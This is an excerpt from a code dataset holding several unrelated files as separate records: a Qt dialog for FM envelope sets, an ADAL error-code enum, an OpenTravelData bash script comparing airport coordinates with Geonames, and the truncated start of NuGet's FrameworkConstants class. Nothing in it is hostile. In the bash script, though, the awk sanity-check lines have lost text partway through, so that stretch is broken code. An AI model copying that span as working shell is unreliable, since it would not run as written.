Ui::FMEnvelopeSetEditDialog)\n{\n\tui->setupUi(this);\n\n\tsetWindowFlags(windowFlags() ^ Qt::WindowContextHelpButtonHint);\n\n\tfor (size_t i = 0; i < set.size(); ++i) {\n\t\tinsertRow(static_cast(i), set.at(i));\n\t}\n}\n\nFMEnvelopeSetEditDialog::~FMEnvelopeSetEditDialog()\n{\n\tdelete ui;\n}\n\nstd::vector FMEnvelopeSetEditDialog::getSet()\n{\n\tstd::vector set;\n\tfor (int i = 0; i < ui->treeWidget->topLevelItemCount(); ++i) {\n\t\tset.push_back(static_cast(\n\t\t\t\t\t\t qobject_cast(ui->treeWidget->itemWidget(\n\t\t\t\t\t\t\t\t\t\t\t\t\t ui->treeWidget->topLevelItem(i), 1))->currentData().toInt()));\n\t}\n\treturn set;\n}\n\nvoid FMEnvelopeSetEditDialog::swapset(int aboveRow, int belowRow)\n{\n\tauto* tree = ui->treeWidget;\n\tQComboBox* belowBox = makeCombobox();\n\tbelowBox->setCurrentIndex(qobject_cast(tree->itemWidget(tree->topLevelItem(belowRow), 1))->currentIndex());\n\tQTreeWidgetItem* below = tree->takeTopLevelItem(belowRow);\n\tif (tree->topLevelItemCount() > 2) {\n\t\tQComboBox* aboveBox = makeCombobox();\n\t\taboveBox->setCurrentIndex(qobject_cast(tree->itemWidget(tree->topLevelItem(aboveRow), 1))->currentIndex());\n\t\tQTreeWidgetItem* above = tree->takeTopLevelItem(aboveRow);\n\t\ttree->insertTopLevelItem(aboveRow, below);\n\t\ttree->insertTopLevelItem(belowRow, above);\n\t\ttree->setItemWidget(below, 1, belowBox);\n\t\ttree->setItemWidget(above, 1, aboveBox);\n\t}\n\telse {\n\t\ttree->insertTopLevelItem(aboveRow, below);\n\t\ttree->setItemWidget(below, 1, belowBox);\n\t}\n\n\tif (!aboveRow || !belowRow) alignTreeOn1stItemChanged();\t// Dummy set and delete to align\n\n\tfor (int i = aboveRow; i < ui->treeWidget->topLevelItemCount(); ++i) {\n\t\tui->treeWidget->topLevelItem(i)->setText(0, QString::number(i));\n\t}\n}\n\nvoid FMEnvelopeSetEditDialog::insertRow(int row, FMEnvelopeTextType type)\n{\n\tif (row == -1) row = 0;\n\tauto item = new QTreeWidgetItem();\n\titem->setText(0, QString::number(row));\n\tQComboBox* box = makeCombobox();\n\tfor (int i = 0; i < box->count(); ++i) 
{\n\t\tif (static_cast(box->itemData(i).toInt()) == type) {\n\t\t\tbox->setCurrentIndex(i);\n\t\t\tbreak;\n\t\t}\n\t}\n\tui->treeWidget->insertTopLevelItem(row, item);\n\tui->treeWidget->setItemWidget(item, 1, box);\n\n\tif (!row) alignTreeOn1stItemChanged();\t// Dummy set and delete to align\n\n\tfor (int i = row + 1; i < ui->treeWidget->topLevelItemCount(); ++i) {\n\t\tui->treeWidget->topLevelItem(i)->setText(0, QString::number(i));\n\t}\n}\n\nQComboBox* FMEnvelopeSetEditDialog::makeCombobox()\n{\n\tauto box = new QComboBox();\n\tbox->addItem(tr(\"Skip\"), static_cast(FMEnvelopeTextType::Skip));\n\tbox->addItem(\"AL\", static_cast(FMEnvelopeTextType::AL));\n\tbox->addItem(\"FB\", static_cast(FMEnvelopeTextType::FB));\n\tbox->addItem(\"AR1\", static_cast(FMEnvelopeTextType::AR1));\n\tbox->addItem(\"DR1\", static_cast(FMEnvelopeTextType::DR1));\n\tbox->addItem(\"SR1\", static_cast(FMEnvelopeTextType::SR1));\n\tbox->addItem(\"RR1\", static_cast(FMEnvelopeTextType::RR1));\n\tbox->addItem(\"SL1\", static_cast(FMEnvelopeTextType::SL1));\n\tbox->addItem(\"TL1\", static_cast(FMEnvelopeTextType::TL1));\n\tbox->addItem(\"KS1\", static_cast(FMEnvelopeTextType::KS1));\n\tbox->addItem(\"ML1\", static_cast(FMEnvelopeTextType::ML1));\n\tbox->addItem(\"DT1\", static_cast(FMEnvelopeTextType::DT1));\n\tbox->addItem(\"AR2\", static_cast(FMEnvelopeTextType::AR2));\n\tbox->addItem(\"DR2\", static_cast(FMEnvelopeTextType::DR2));\n\tbox->addItem(\"SR2\", static_cast(FMEnvelopeTextType::SR2));\n\tbox->addItem(\"RR2\", static_cast(FMEnvelopeTextType::RR2));\n\tbox->addItem(\"SL2\", static_cast(FMEnvelopeTextType::SL2));\n\tbox->addItem(\"TL2\", static_cast(FMEnvelopeTextType::TL2));\n\tbox->addItem(\"KS2\", static_cast(FMEnvelopeTextType::KS2));\n\tbox->addItem(\"ML2\", static_cast(FMEnvelopeTextType::ML2));\n\tbox->addItem(\"DT2\", static_cast(FMEnvelopeTextType::DT2));\n\tbox->addItem(\"AR3\", static_cast(FMEnvelopeTextType::AR3));\n\tbox->addItem(\"DR3\", static_cast(FMEnvelopeTextType::DR3));\n\tbox->addItem(\"SR3\", static_cast(FMEnvelopeTextType::SR3));\n\tbox->addItem(\"RR3\", static_cast(FMEnvelopeTextType::RR3));\n\tbox->addItem(\"SL3\", static_cast(FMEnvelopeTextType::SL3));\n\tbox->addItem(\"TL3\", static_cast(FMEnvelopeTextType::TL3));\n\tbox->addItem(\"KS3\", static_cast(FMEnvelopeTextType::KS3));\n\tbox->addItem(\"ML3\", static_cast(FMEnvelopeTextType::ML3));\n\tbox->addItem(\"DT3\", static_cast(FMEnvelopeTextType::DT3));\n\tbox->addItem(\"AR4\", static_cast(FMEnvelopeTextType::AR4));\n\tbox->addItem(\"DR4\", static_cast(FMEnvelopeTextType::DR4));\n\tbox->addItem(\"SR4\", static_cast(FMEnvelopeTextType::SR4));\n\tbox->addItem(\"RR4\", static_cast(FMEnvelopeTextType::RR4));\n\tbox->addItem(\"SL4\", static_cast(FMEnvelopeTextType::SL4));\n\tbox->addItem(\"TL4\", static_cast(FMEnvelopeTextType::TL4));\n\tbox->addItem(\"KS4\", static_cast(FMEnvelopeTextType::KS4));\n\tbox->addItem(\"ML4\", static_cast(FMEnvelopeTextType::ML4));\n\tbox->addItem(\"DT4\", static_cast(FMEnvelopeTextType::DT4));\n\treturn box;\n}\n\n/// Dummy set and delete to align\nvoid FMEnvelopeSetEditDialog::alignTreeOn1stItemChanged()\n{\n\tauto tmp = new QTreeWidgetItem();\n\tui->treeWidget->insertTopLevelItem(1, tmp);\n\tdelete ui->treeWidget->takeTopLevelItem(1);\n}\n\nvoid FMEnvelopeSetEditDialog::on_upToolButton_clicked()\n{\n\tint curRow = ui->treeWidget->currentIndex().row();\n\tif (!curRow) return;\n\n\tswapset(curRow - 1, curRow);\n\tui->treeWidget->setCurrentItem(ui->treeWidget->topLevelItem(curRow - 1));\n}\n\nvoid 
FMEnvelopeSetEditDialog::on_downToolButton_clicked()\n{\n\tint curRow = ui->treeWidget->currentIndex().row();\n\tif (curRow == ui->treeWidget->topLevelItemCount() - 1) return;\n\n\tswapset(curRow, curRow + 1);\n\tui->treeWidget->setCurrentItem(ui->treeWidget->topLevelItem(curRow + 1));\n}\n\nvoid FMEnvelopeSetEditDialog::on_addPushButton_clicked()\n{\n\tint row = ui->treeWidget->currentIndex().row();\n\tinsertRow(row, FMEnvelopeTextType::Skip);\n\n\tui->treeWidget->setCurrentItem(ui->treeWidget->topLevelItem((row == -1) ? 0 : row));\n\tui->upToolButton->setEnabled(true);\n\tui->downToolButton->setEnabled(true);\n\tui->removePushButton->setEnabled(true);\n}\n\nvoid FMEnvelopeSetEditDialog::on_removePushButton_clicked()\n{\n\tint row = ui->treeWidget->currentIndex().row();\n\tdelete ui->treeWidget->takeTopLevelItem(row);\n\n\tfor (int i = row; i < ui->treeWidget->topLevelItemCount(); ++i) {\n\t\tui->treeWidget->topLevelItem(i)->setText(0, QString::number(i));\n\t}\n\n\tif (!ui->treeWidget->topLevelItemCount()) {\n\t\tui->upToolButton->setEnabled(false);\n\t\tui->downToolButton->setEnabled(false);\n\t\tui->removePushButton->setEnabled(false);\n\t}\n}\n\nvoid FMEnvelopeSetEditDialog::on_treeWidget_itemSelectionChanged()\n{\n\tif (ui->treeWidget->currentIndex().row() == -1) {\n\t\tui->upToolButton->setEnabled(false);\n\t\tui->downToolButton->setEnabled(false);\n\t\tui->removePushButton->setEnabled(false);\n\t}\n\telse {\n\t\tui->upToolButton->setEnabled(true);\n\t\tui->downToolButton->setEnabled(true);\n\t\tui->removePushButton->setEnabled(true);\n\t}\n}\n"} {"text": "// Copyright © Microsoft Open Technologies, Inc.\n//\n// All Rights Reserved\n//\n// Licensed under the Apache License, Version 2.0 (the \"License\");\n// you may not use this file except in compliance with the License.\n// You may obtain a copy of the License at\n//\n// http://www.apache.org/licenses/LICENSE-2.0\n//\n// THIS CODE IS PROVIDED *AS IS* BASIS, WITHOUT WARRANTIES OR CONDITIONS\n// OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION\n// ANY IMPLIED WARRANTIES OR CONDITIONS OF TITLE, FITNESS FOR A\n// PARTICULAR PURPOSE, MERCHANTABILITY OR NON-INFRINGEMENT.\n//\n// See the Apache License, Version 2.0 for the specific language\n// governing permissions and limitations under the License.\n\n/*! The class contains an incrementally expanding list of errors */\ntypedef enum\n{\n /*! No error occurred. The value is added to make easier usage of functions that take error code,\n but no error condition occurred.*/\n AD_ERROR_SUCCEEDED = 0,\n \n /*! The user has cancelled the applicable UI prompts */\n AD_ERROR_USER_CANCEL = 1,\n \n /*! The method call contains one or more invalid arguments */\n AD_ERROR_INVALID_ARGUMENT = 2,\n \n /*! HTTP 401 (Unauthorized) response does not contain the OAUTH2 required header */\n AD_ERROR_MISSING_AUTHENTICATE_HEADER = 3,\n \n /*! HTTP 401 (Unauthorized) response's authentication header is in invalid format\n or does not contain expected values. */\n AD_ERROR_AUTHENTICATE_HEADER_BAD_FORMAT = 4,\n \n /*! An internal error occurs when the library did not receive\n a response from the server */\n AD_ERROR_CONNECTION_MISSING_RESPONSE = 5,\n \n /*! The logic expects the server to return HTTP_UNAUTHORIZED */\n AD_ERROR_UNAUTHORIZED_CODE_EXPECTED = 6,\n \n /*! The refresh token cannot be used for extracting an access token. */\n AD_ERROR_INVALID_REFRESH_TOKEN = 7,\n \n /*! An unexpected internal error occurred. */\n AD_ERROR_UNEXPECTED = 8,\n \n /*! 
Access tokens for multiple users exist in the token cache. Please specify the userId. */\n AD_ERROR_MULTIPLE_USERS = 9,\n \n /*! User needs to re-authorize resource usage. This error is raised when access token cannot \n be obtained without user explicitly re-authorizing, but the developer has called \n acquireTokenSilentWithResource method. To obtain the token, the application will need to call\n acquireTokenWithResource after this error to allow the library to give user abitlity\n to re-authorize (with web UI involved). */\n AD_ERROR_USER_INPUT_NEEDED = 10,\n \n /*! The cache store cannot be persisted to the specified location. This error is raised only if\n the application called explicitly to persist the cache. Else, the errors are only logged\n as warnings. */\n AD_ERROR_CACHE_PERSISTENCE = 11,\n \n /*! An issue occurred while attempting to read the persisted token cache store. */\n AD_ERROR_BAD_CACHE_FORMAT = 12,\n \n /*! The user is currently prompted for another authentication. The library chose to raise this\n error instead of waiting to avoid multiple sequential prompts. It is up to the application\n developer to chose to retry later. */\n AD_ERROR_USER_PROMPTED = 13,\n \n /*! This type of error occurs when something went wrong with the application stack, e.g.\n the resource bundle cannot be loaded. */\n AD_ERROR_APPLICATION = 14,\n \n /*! A generic error code for all of the authentication errors. */\n AD_ERROR_AUTHENTICATION = 15,\n \n /*! An error was raised during the process of validating the authorization authority. */\n AD_ERROR_AUTHORITY_VALIDATION = 16,\n \n /*! Failed to extract the main view controller of the application. Make sure that the application\n has UI elements.*/\n AD_ERROR_NO_MAIN_VIEW_CONTROLLER = 17,\n \n /*! Failed to extract the framework resources (e.g. storyboards). Please read the readme and documentation\n for the library on how to link the ADAL library with its resources to your project.*/\n AD_ERROR_MISSING_RESOURCES = 18,\n \n /*! Token requested for user A, but obtained for user B. This can happen if the user explicitly authenticated\n as user B in the login UI, or if cookies for user B are already present.*/\n AD_ERROR_WRONG_USER = 19,\n \n /*! When client authentication is requested by TLS, the library attempts to extract the authentication\n certificate. The error is generated if more than one certificate is found in the keychain. */\n AD_ERROR_MULTIPLE_TLS_CERTIFICATES = 20,\n \n /*! When the hash of the decrypted broker response does not match the hash returned from broker. */\n AD_ERROR_BROKER_RESPONSE_HASH_MISMATCH = 21,\n \n /*! When the application waiting for broker is activated without broker response. */\n AD_ERROR_BROKER_RESPONSE_NOT_RECEIVED = 22,\n \n /*! When work place join is required by the service. */\n AD_ERROR_WPJ_REQUIRED = 23,\n \n /*! The redirect URI cannot be used for invoking broker. */\n AD_ERROR_INVALID_REDIRECT_URI = 23,\n \n /*! The error code was not sent to us due to an older version of the broker */\n AD_ERROR_BROKER_UNKNOWN = 24,\n \n /*! 
Server redirects authentication process to a non-https url */\n AD_ERROR_NON_HTTPS_REDIRECT = 25\n \n} ADErrorCode;\n\n/* HTTP status codes used by the library */\ntypedef enum\n{\n HTTP_UNAUTHORIZED = 401,\n} HTTPStatusCodes;"} {"text": "-DGMENU_I_KNOW_THIS_IS_UNSTABLE\n"} {"text": "#!/bin/bash\n\n#\n# OpenTravelData (OPTD) utility\n# Git repository:\n# https://github.com/opentraveldata/opentraveldata/tree/master/tools\n#\n\n#\n# Four parameters are optional for this script:\n# - the Geonames data dump file, only for its geographical coordinates\n# - the OPTD-maintained list of \"best known\" POR (points of reference)\n# - the OPTD-maintained list of POR importance (i.e., PageRank) figures\n# - the minimal distance (in km) triggering a difference\n#\n\n##\n# GNU tools, including on MacOS\nsource setGnuTools.sh || exit -1\n\n##\n# Directories\nsource setDirs.sh \"$0\" || exit -1\n\n##\n# Log level\nLOG_LEVEL=3\n\n##\n# Data path\nOPTD_DIR=\"${EXEC_PATH}../\"\nDATA_DIR=\"${OPTD_DIR}opentraveldata/\"\n\n##\n# Geonames data dump file\nGEONAME_FILE_RAW_FILENAME=\"dump_from_geonames.csv\"\nGEONAME_FILENAME=\"wpk_${GEONAME_FILE_RAW_FILENAME}\"\nGEONAME_FILE_SORTED=\"sorted_${GEONAME_FILENAME}\"\nGEONAME_FILE_SORTED_CUT=\"cut_${GEONAME_FILE_SORTED}\"\n#\nGEONAME_FILE_RAW=\"${TMP_DIR}${GEONAME_FILE_RAW_FILENAME}\"\nGEONAME_FILE=\"${TMP_DIR}${GEONAME_FILENAME}\"\n\n##\n# OPTD-maintained list of \"best known\" POR (points of reference)\nOPTD_BEST_FILENAME=\"optd_por_best_known_so_far.csv\"\n#\nOPTD_BEST_FILE=\"${DATA_DIR}${OPTD_BEST_FILENAME}\"\n\n##\n# OPTD-maintained list of POR importance (i.e., PageRank) figures\nAIRPORT_PR_FILENAME=\"ref_airport_pageranked.csv\"\nAIRPORT_PR_SORTED=\"sorted_${AIRPORT_PR_FILENAME}\"\nAIRPORT_PR_SORTED_CUT=\"cut_sorted_${AIRPORT_PR_FILENAME}\"\n#\nAIRPORT_PR_FILE=\"${DATA_DIR}${AIRPORT_PR_FILENAME}\"\n\n##\n# Comparison files\nPOR_MAIN_DIFF_FILENAME=\"optd_por_diff_w_geonames.csv\"\n#\nPOR_MAIN_DIFF=\"${DATA_DIR}${POR_MAIN_DIFF_FILENAME}\"\n\n# Minimal distance triggering a difference (in km)\nCOMP_MIN_DIST=10\n\n##\n# Missing POR\nGEONAME_FILE_MISSING=\"${GEONAME_FILE}.missing\"\nOPTD_BEST_FILE_MISSING=\"${OPTD_BEST_FILE}.missing\"\n\n\n##\n# Temporary files\nOPTD_BEST_WITH_NOHD=\"${TMP_DIR}${OPTD_BEST_FILENAME}.wohd\"\nGEO_COMBINED_TMP_FILE=\"geo_combined_file.csv.tmp\"\n\n\n##\n# Usage helper\n#\nif [ \"$1\" = \"-h\" -o \"$1\" = \"--help\" ]\nthen\n\techo\n\techo \"Usage: $0 [ [ [] []]]]\"\n\techo \" - Default name for the Geonames data dump file: '${GEONAME_FILE_RAW}'\"\n\techo \" - Default name for the OPTD-maintained file of best known coordinates: '${OPTD_BEST_FILE}'\"\n\techo \" - Default name for the PageRanked POR file: '${AIRPORT_PR_FILE}'\"\n\techo \" - Default minimum distance (in km) triggering a difference: '${COMP_MIN_DIST}'\"\n\techo\n\texit\nfi\n\n\n##\n# Cleaning\n#\nif [ \"$1\" = \"--clean\" ]\nthen\n\tif [ \"${TMP_DIR}\" = \"/tmp/por/\" ]\n\tthen\n\t\t\\rm -rf ${TMP_DIR}\n\telse\n\t\t\\rm -f ${GEONAME_FILE_MISSING} ${OPTD_BEST_FILE_MISSING} \\\n\t\t\t${OPTD_BEST_FILE_HEADER} ${OPTD_BEST_WITH_NOHD} \\\n\t\t\t${GEONAME_FILE} ${GEONAME_FILE_SORTED} ${GEONAME_FILE_SORTED_CUT} \\\n\t\t\t${AIRPORT_PR_SORTED} ${AIRPORT_PR_SORTED_CUT}\n\tfi\n\texit\nfi\n\n\n##\n# Local helper scripts\nPREPARE_EXEC=\"bash ${EXEC_PATH}prepare_geonames_dump_file.sh\"\nPREPARE_POP_EXEC=\"bash ${EXEC_PATH}prepare_popularity.sh\"\nPREPARE_PR_EXEC=\"bash ${EXEC_PATH}prepare_pagerank.sh\"\nCOMPARE_EXEC=\"bash ${EXEC_PATH}compare_geo_files.sh\"\n\n\n##\n# Geonames data dump 
file\nif [ \"$1\" != \"\" ]\nthen\n\tGEONAME_FILE_RAW=$1\n\tGEONAME_FILE_RAW_FILENAME=`basename ${GEONAME_FILE_RAW}`\n\tGEONAME_FILENAME=wpk_${GEONAME_FILE_RAW_FILENAME}\n\tGEONAME_FILE_SORTED=sorted_${GEONAME_FILENAME}\n\tGEONAME_FILE_SORTED_CUT=cut_${GEONAME_FILE_SORTED}\n\tif [ \"${GEONAME_FILE_RAW}\" = \"${GEONAME_FILE_RAW_FILENAME}\" ]\n\tthen\n\t\tGEONAME_FILE_RAW=\"${TMP_DIR}${GEONAME_FILE_RAW_FILENAME}\"\n\tfi\nfi\nGEONAME_FILE=\"${TMP_DIR}${GEONAME_FILENAME}\"\nGEONAME_FILE_SORTED=\"${TMP_DIR}${GEONAME_FILE_SORTED}\"\nGEONAME_FILE_SORTED_CUT=\"${TMP_DIR}${GEONAME_FILE_SORTED_CUT}\"\n\nif [ ! -f \"${GEONAME_FILE_RAW}\" ]\nthen\n\techo\n\techo \"[$0:$LINENO] The '${GEONAME_FILE_RAW}' file does not exist.\"\n\tif [ \"$1\" = \"\" ];\n\tthen\n\t\t${PREPARE_EXEC} --geonames\n\t\techo \"The default name of the Geonames data dump copy is '${GEONAME_FILE_RAW}'.\"\n\t\techo\n\tfi\n\texit -1\nfi\n\n\n##\n# Prepare the Geonames dump file, downloaded from Geonames and pre-processed.\n# Basically, a primary key is added and the coordinates are extracted,\n# in order to keep a data file with only four fields/columns:\n# * The primary key (IATA code - location type)\n# * The airport/city code\n# * The geographical coordinates.\n${PREPARE_EXEC} ${OPTD_DIR} ${LOG_LEVEL}\n\n\n# OPTD-maintained list of \"best known\" geographical coordinates\nif [ \"$2\" != \"\" ]\nthen\n\tOPTD_BEST_FILE=\"$2\"\nfi\n\nif [ ! -f \"${OPTD_BEST_FILE}\" ]\nthen\n\techo\n\techo \"[$0:$LINENO] The '${OPTD_BEST_FILE}' file does not exist.\"\n\tif [ \"$2\" = \"\" ]\n\tthen\n\t\techo\n\t\techo \"Hint:\"\n\t\techo \"\\cp -f ${EXEC_PATH}../OPTD/${OPTD_BEST_FILENAME} ${TMP_DIR}\"\n\t\techo\n\tfi\n\texit -1\nfi\n\n\n##\n# Data file of PageRanked POR\nif [ \"$3\" != \"\" ]\nthen\n\tAIRPORT_PR_FILE=$3\n\tAIRPORT_PR_FILENAME=`basename ${AIRPORT_PR_FILE}`\n\tAIRPORT_PR_SORTED=sorted_${AIRPORT_PR_FILENAME}\n\tAIRPORT_PR_SORTED_CUT=cut_${AIRPORT_PR_SORTED}\n\tif [ \"${AIRPORT_PR_FILE}\" = \"${AIRPORT_PR_FILENAME}\" ]\n\tthen\n\t\tAIRPORT_PR_FILE=\"${TMP_DIR}${AIRPORT_PR_FILENAME}\"\n\tfi\nfi\nAIRPORT_PR_SORTED=${TMP_DIR}${AIRPORT_PR_SORTED}\nAIRPORT_PR_SORTED_CUT=${TMP_DIR}${AIRPORT_PR_SORTED_CUT}\n\nif [ ! -f \"${AIRPORT_PR_FILE}\" ]\nthen\n\techo\n\techo \"[$0:$LINENO] The '${AIRPORT_PR_FILE}' file does not exist.\"\n\tif [ \"$3\" = \"\" ]\n\tthen\n\t\t${PREPARE_PR_EXEC} --popularity\n\t\techo \"The default name of the airport popularity copy is '${AIRPORT_PR_FILE}'.\"\n\t\techo\n\tfi\n\texit -1\nfi\n\n\n##\n# Prepare the OPTD-maintained airport popularity dump file. Basically, the file\n# is sorted by IATA code. 
Then, only two columns/fields are kept in that\n# version of the file: the airport/city IATA code and the airport popularity.\n${PREPARE_PR_EXEC} ${AIRPORT_PR_FILE}\n\n\n##\n# Minimal distance (in km) triggering a difference\nif [ \"$4\" != \"\" ]\nthen\n\tCOMP_MIN_DIST=$4\nfi\n\n##\n# Extract the header into a temporary file\nOPTD_BEST_FILE_HEADER=${OPTD_BEST_FILE}.tmp.hdr\ngrep -E \"^pk(.+)\" ${OPTD_BEST_FILE} > ${OPTD_BEST_FILE_HEADER}\n\n# Remove the header\n${SED_TOOL} -E \"s/^pk(.+)//g\" ${OPTD_BEST_FILE} > ${OPTD_BEST_WITH_NOHD}\n${SED_TOOL} -i\"\" -E \"/^$/d\" ${OPTD_BEST_WITH_NOHD}\n\n##\n# The two files contain only four fields (the primary key, the IATA code and\n# both coordinates).\n#\n# Note that the ${PREPARE_EXEC} (e.g., prepare_geonames_dump_file.sh) script\n# prepares such a file for Geonames (named ${GEONAME_FILE_SORTED_CUT}, e.g.,\n# cut_sorted_wpk_dump_from_geonames.csv) from the data dump (named\n# ${GEONAME_FILE}, e.g., wpk_dump_from_geonames.csv).\n#\n# The 'join' command aggregates:\n# * The four fields of the (stripped) Geonames dump file.\n# That is the file #1 for the join command.\n# * The five fields of the file of best known coordinates (the primary key has\n# been stripped by the join command), i.e.:\n# * the IATA codes of both the POR and its served city\n# * the two geographical coordinates.\n# * the effective date (when empty, it means the POR has always existed).\n#\n# The 'join' command takes all the rows from the file #1 (Geonames dump file).\n# When there is no corresponding entry in the file of best coordinates, only\n# the four (extracted) fields of the Geonames dump file are kept.\n# Hence, lines may have:\n# * 9 fields: the primary key, IATA code and both coordinates of the Geonames\n# dump file, followed by the IATA codes of the POR and its served city,\n# as well as the best coordinates, ended by the from validity date.\n# * 4 fields: the primary key, IATA code and both coordinates of the Geonames\n# dump file.\n#\nGEONAME_MASTER=\"${GEO_COMBINED_TMP_FILE}.geomst\"\njoin -t'^' -a 1 -1 1 -2 1 -e NULL \\\n\t${GEONAME_FILE_SORTED_CUT} ${OPTD_BEST_WITH_NOHD} > ${GEONAME_MASTER}\n#echo \"head -3 ${GEONAME_FILE_SORTED_CUT} ${OPTD_BEST_WITH_NOHD} ${GEONAME_MASTER}\"\n\n\n##\n# Sanity check: calculate the minimal number of fields on the resulting file\n#\nMIN_FIELD_NB=`awk -F'^' 'BEGIN{n=10} {if (NF ${OPTD_BEST_MASTER}\n#echo \"head -3 ${GEONAME_FILE_SORTED_CUT} ${OPTD_BEST_WITH_NOHD} ${OPTD_BEST_MASTER}\"\n\n\n##\n# Sanity check: calculate the minimal number of fields on the resulting file\n#\nMIN_FIELD_NB=`awk -F'^' 'BEGIN{n=10} {if (NF ${GEONAME_MASTER}.dup\n#echo \"head -3 ${GEONAME_MASTER} ${GEONAME_MASTER}.dup\"\n\\mv -f ${GEONAME_MASTER}.dup ${GEONAME_MASTER}\ncut -d'^' -f 1-4 ${OPTD_BEST_MASTER} > ${OPTD_BEST_MASTER}.dup\n#echo \"head -3 ${OPTD_BEST_MASTER} ${OPTD_BEST_MASTER}.dup\"\n\\mv -f ${OPTD_BEST_MASTER}.dup ${OPTD_BEST_MASTER}\n\n\n##\n# Re-sort the files. 
Indeed, when there are duplicates (e.g., DUR/Durham),\n# the duplicated lines may not be in the sorting order, due to the coordinates\nsort ${GEONAME_MASTER} > ${GEONAME_MASTER}.dup\n\\mv -f ${GEONAME_MASTER}.dup ${GEONAME_MASTER}\nsort ${OPTD_BEST_MASTER} > ${OPTD_BEST_MASTER}.dup\n\\mv -f ${OPTD_BEST_MASTER}.dup ${OPTD_BEST_MASTER}\n\n\n##\n# Do some reporting\n#\n# Reminder:\n# * ${GEONAME_MASTER} (e.g., geo_combined_file.csv.tmp.geomst) has got all\n# the entries of the Geonames dump file (./wpk_dump_from_geonames.csv)\n# * ${OPTD_BEST_MASTER} (e.g., geo_combined_file.csv.tmp.bstmst) has got all\n# the entries of the OPTD-maintained list of best known geographical\n# coordinates (optd_por_best_known_so_far.csv)\n#\n#echo \"comm -12 ${GEONAME_MASTER} ${OPTD_BEST_MASTER} | less\"\n#echo \"comm -23 ${GEONAME_MASTER} ${OPTD_BEST_MASTER} | less\"\n#echo \"comm -13 ${GEONAME_MASTER} ${OPTD_BEST_MASTER} | less\"\nPOR_NB_COMMON=\"$(comm -12 ${GEONAME_MASTER} ${OPTD_BEST_MASTER} | ${WC_TOOL} -l)\"\nPOR_NB_FILE1=\"$(comm -23 ${GEONAME_MASTER} ${OPTD_BEST_MASTER} | ${WC_TOOL} -l)\"\nPOR_NB_FILE2=\"$(comm -13 ${GEONAME_MASTER} ${OPTD_BEST_MASTER} | ${WC_TOOL} -l)\"\necho\necho \"Reporting step\"\necho \"--------------\"\necho \"'${GEONAME_FILE}' and '${OPTD_BEST_FILE}' have got ${POR_NB_COMMON} common lines.\"\necho \"'${GEONAME_FILE}' has got ${POR_NB_FILE1} POR, missing from '${OPTD_BEST_FILE}'\"\necho \"'${OPTD_BEST_FILE}' has got ${POR_NB_FILE2} POR, missing from '${GEONAME_FILE}'\"\necho\n\nif [ ${POR_NB_FILE2} -gt 0 ]\nthen\n\tcomm -13 ${GEONAME_MASTER} ${OPTD_BEST_MASTER} > ${GEONAME_FILE_MISSING}\n\tPOR_MISSING_GEONAMES_NB=\"$(${WC_TOOL} -l ${GEONAME_FILE_MISSING} | cut -d' ' -f1)\"\n\techo\n\techo \"Suggestion step\"\n\techo \"---------------\"\n\techo \"${POR_MISSING_GEONAMES_NB} points of reference (POR) are missing from Geonames ('${GEONAME_FILE}').\"\n\techo \"They can be displayed with: less ${GEONAME_FILE_MISSING}\"\n\techo \"You may also want to launch the following script:\"\n\techo \"./generate_por_lists_for_geonames.sh\"\n\techo\nfi\n\nif [ ${POR_NB_FILE1} -gt 0 ]\nthen\n\tcomm -23 ${GEONAME_MASTER} ${OPTD_BEST_MASTER} > ${OPTD_BEST_FILE_MISSING}\n\tPOR_MISSING_BEST_NB=\"$(${WC_TOOL} -l ${OPTD_BEST_FILE_MISSING} | cut -d' ' -f1)\"\n\techo\n\techo \"Suggestion step\"\n\techo \"---------------\"\n\techo \"${POR_MISSING_BEST_NB} points of reference (POR) are missing from the file of best coordinates ('${OPTD_BEST_FILE}' => '${OPTD_BEST_WITH_NOHD}').\"\n\techo \"To incorporate the missing POR into '${OPTD_BEST_FILE}', just do:\"\n\techo \"cat ${OPTD_BEST_WITH_NOHD} ${OPTD_BEST_FILE_MISSING} | sort -t'^' -k1,1 > ${OPTD_BEST_FILE}.tmp && \\mv -f ${OPTD_BEST_FILE}.tmp ${OPTD_BEST_FILE} && \\rm -f ${OPTD_BEST_FILE_MISSING}\"\n\techo\nfi\n\n\n##\n# Compare the Geonames coordinates to the best known ones (until now).\n# It generates a data file (${POR_MAIN_DIFF}, e.g., optd_por_diff_w_geonames.csv)\n# containing the greatest distances (in km), for each airport/city, between\n# both sets of coordinates (Geonames and best known ones).\n${COMPARE_EXEC} ${GEONAME_FILE_SORTED_CUT} ${OPTD_BEST_WITH_NOHD} \\\n\t${AIRPORT_PR_FILE} ${COMP_MIN_DIST}\n# ${AIRPORT_PR_SORTED_CUT}\n\n\n##\n# Cleaning of temporary files\n#\nif [ \"${TMP_DIR}\" != \"/tmp/por/\" ]\nthen\n\t\\rm -f ${JOINED_COORD} ${JOINED_COORD_FULL}\n\t\\rm -f ${OPTD_BEST_FILE_HEADER}\n\t\\rm -f ${GEONAME_MASTER} ${OPTD_BEST_MASTER}\n\t\\rm -f ${GEONAME_FILE_SORTED} ${GEONAME_FILE_SORTED_CUT}\nfi\n"} {"text": "// Copyright (c) .NET 
Foundation. All rights reserved.\n// Licensed under the Apache License, Version 2.0. See License.txt in the project root for license information.\n\nusing System;\nusing System.Collections.Generic;\n\nnamespace NuGet.Frameworks\n{\n#if NUGET_FRAMEWORKS_INTERNAL\n internal\n#else\n public\n#endif\n static class FrameworkConstants\n {\n public static readonly Version EmptyVersion = new Version(0, 0, 0, 0);\n public static readonly Version MaxVersion = new Version(int.MaxValue, 0, 0, 0);\n public static readonly Version Version5 = new Version(5, 0, 0, 0);\n public static readonly Version Version10 = new Version(10, 0, 0, 0);\n public static readonly FrameworkRange DotNetAll = new FrameworkRange(\n new NuGetFramework(FrameworkIdentifiers.NetPlatform, FrameworkConstants.EmptyVersion),\n new NuGetFramework(FrameworkIdentifiers.NetPlatform, FrameworkConstants.MaxVersion));\n\n public static class SpecialIdentifiers\n {\n public const string Any = \"Any\";\n public const string Agnostic = \"Agnostic\";\n public const string Unsupported = \"Unsupported\";\n }\n\n public static class PlatformIdentifiers\n {\n public const string WindowsPhone = \"WindowsPhone\";\n public const string Windows = \"Windows\";\n }\n\n public static class FrameworkIdentifiers\n {\n public const string NetCoreApp = \".NETCoreApp\";\n public const string NetStandardApp = \".NETStandardApp\";\n public const string NetStandard = \".NETStandard\";\n public const string NetPlatform = \".NETPlatform\";\n public const string DotNet = \"dotnet\";\n public const string Net = \".NETFramework\";\n public const string NetCore = \".NETCore\";\n public const string WinRT = \"WinRT\"; // 